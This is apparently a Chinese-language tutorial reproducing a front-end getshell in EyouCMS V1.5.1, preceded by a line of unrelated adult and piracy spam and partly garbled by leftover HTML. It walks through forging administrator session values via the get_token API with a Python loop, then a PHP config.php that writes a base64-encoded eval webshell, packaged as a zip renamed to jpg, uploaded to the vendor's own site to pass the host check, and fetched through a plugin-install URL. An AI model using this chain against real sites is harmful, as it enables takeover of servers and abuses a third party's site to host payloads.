两个人看的www视频中文字幕,√天堂资源地址中文在线,成人做爰100部片

0x00 漏洞簡(jiǎn)介

0x01 影響版本

##0x02 環(huán)境建置

0x03 漏洞分析

#check_priv

0x05 修復(fù)建議

首頁(yè)

運(yùn)維

安全

如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)

PHPz

May 20, 2023 pm 08:14 PM

getshell eyoucms

0x00 漏洞簡(jiǎn)介

讚讚網(wǎng)路科技EyouCMS（易優(yōu)CMS）是中國(guó)讚贊網(wǎng)路科技公司的一套基於ThinkPHP的開源內(nèi)容管理系統(tǒng)（CMS）。

Eyoucms v1.5.1 及以前版本存在任意使用者後臺(tái)登陸與檔案包含漏洞，該漏洞使攻擊者可以透過(guò)呼叫api，在前臺(tái)設(shè)定一個(gè)管理員的session，後臺(tái)遠(yuǎn)端插件下載檔案包含getshell。

0x01 影響版本

EyouCMS <= 1.5.1

##0x02 環(huán)境建置

下載

官網(wǎng)下載V1.5.1版本
下載連線：https://qiniu.eyoucms.com/EyouCMS-V1.5.1-UTF8-SP3_142.zip

#安裝

透過(guò)phpstudy整合環(huán)境簡(jiǎn)單部署

如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)

0x03 漏洞分析

前臺(tái)設(shè)定管理員session在application/api/controller/Ajax.php :215

如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)

get_token

#函數(shù)是可以被前臺(tái)隨意呼叫的，另外形參中的

#$name

變數(shù)也是透過(guò)http傳遞進(jìn)來(lái)的。跟進(jìn)token函數(shù)，如下圖所示。

如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)

高亮處有一個(gè)設(shè)定session的操作，名字是可控的，而值是請(qǐng)求時(shí)間戳md5的值。不可控。

可以嘗試透過(guò)這個(gè)設(shè)定session的操作，建構(gòu)出一個(gè)後臺(tái)管理員的session。然後我們整理一下後臺(tái)管理員的登入邏輯。在application/admin/controller/Base.php:54
如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)

這裡涉及到了兩個(gè)session,一個(gè)admin_login_expire，一個(gè)admin_id

if (session(&#39;?admin_id&#39;) && getTime() - intval($admin_login_expire) < $web_login_expiretime)

admin_login_expire

如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)

#（該session會(huì)做減法的校驗(yàn)，需要滿足一定條件）

admin_id 如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)

（該session有就即可，不會(huì)驗(yàn)證其值）

設(shè)定完這兩個(gè)session後，我們繼續(xù)看到if條件判斷裡還有一個(gè)

#check_priv

函數(shù)，跟進(jìn)查看：

如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)

if (0 >=?intval(session('admin_info.role_id')))</code></p>
<p>admin_info.role_id<br><img src="/static/imghw/default1.png" data-src="https://img.php.cn/upload/article/000/000/164/168458488418027.jpg" class="lazy" alt="如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)"></p>#(滿足小於等於0即可)<p>設(shè)定完三個(gè)session後，就可以進(jìn)後臺(tái)了，如圖：<br><img src="/static/imghw/default1.png" data-src="https://img.php.cn/upload/article/000/000/164/168458488498951.jpg" class="lazy" alt="如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)"></p>
<p>後臺(tái)遠(yuǎn)端外掛程式下載getshell在application/admin/controller/Weapp.php:1235<br><img src="/static/imghw/default1.png" data-src="https://img.php.cn/upload/article/000/000/164/168458488422879.jpg" class="lazy" alt="如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)"></p>這裡傳進(jìn)來(lái)一個(gè)$url，然後做一個(gè)url解析，要滿足host為eyoucms.com。 <p>也就是程式限制只能從官網(wǎng)下載外掛程式安裝，但這個(gè)校驗(yàn)太簡(jiǎn)單了，可以??繞。 <br>然後下文就是請(qǐng)求這個(gè)下載鏈接，做解壓縮操作，並包含進(jìn)來(lái)config.php。 <br><strong></strong></p>這後面再做的外掛標(biāo)準(zhǔn)判斷已經(jīng)不起作用了。 <p><br><img src="/static/imghw/default1.png" data-src="https://img.php.cn/upload/article/000/000/164/168458488464024.jpg" class="lazy" alt="如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)">0x04 漏洞利用</p>######前臺(tái)設(shè)定一個(gè)管理員的session###首先我們可以先取出成功登陸後的管理員session與未登入的普通使用者session做比較###管理員：############普通使用者：#############呼叫g(shù)et_token函數(shù)設(shè)定名為admin_login_expire的session####### ######再查看該普通使用者的session############已成功設(shè)定。 ###同樣的我們可以把a(bǔ)dmin_id與admin_info.roke_id加進(jìn)去。 ######但是###這md5字串顯然不符合漏洞分析中的要求，所以這裡透過(guò)腳本不斷刷新session,直到尋找到適當(dāng)?shù)膍d5值###<pre class="brush:php;toolbar:false">while?1?:
????admin_login_expire?=?api_psot("admin_login_expire")
????num_10?=?admin_login_expire[2:12]
????if?is_number(num_10):
????????print("admin_login_expire=",num_10)
????????break
while?1?:
????role_id?=?api_psot("admin_info.role_id")
????num_1?=?role_id[2:3]
????if?num_1?in?["a","b","c","d","e","f"]:
????????print("role_id=",num_1)
????????break
admin_id?=?api_psot("admin_id")
print("admin_id=",admin_id[2:-1])

###運(yùn)行結(jié)果：## #######

session:
如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)

再經(jīng)過(guò)application/admin/controller/Base.php:58和:106的intval()的轉(zhuǎn)換：
如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)

成功使用該P(yáng)HPSESSID進(jìn)入后臺(tái)：
如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)

后臺(tái)遠(yuǎn)程插件下載文件包含getshell
然后開始制作惡意壓縮包，文件目錄結(jié)構(gòu)如下：

weappp\weapp\test\config.phpconfig.php

文件內(nèi)容為寫入webshell

<?php  file_put_contents("./uploads/allimg/news_2021.php",base64_decode("PD9waHAgcGhwaW5mbygpO0BldmFsKCRfUE9TVFttb3Z4XSk7Pz4="));
?>

壓縮成weappp.zip，修改后綴為jpg
如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)

到eyoucms.com官網(wǎng)尋找圖片上傳點(diǎn)
比如這個(gè)提問(wèn)模塊的問(wèn)題描述：
https://www.eyoucms.com/ask/
如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)

獲取到上傳的圖片地址：
https://www.eyoucms.com/uploads/allimg/210420/1618908445631562.jpg
直接在瀏覽器中請(qǐng)求下載該插件：
http://192.168.58.180/login.php?m=admin&c=weapp&a=downloadInstall&url=https://www.eyoucms.com/uploads/allimg/210420/1618908445631562.jpg
如何進(jìn)行EyouCMS V1.5.1 前臺(tái)getshell漏洞復(fù)現(xiàn)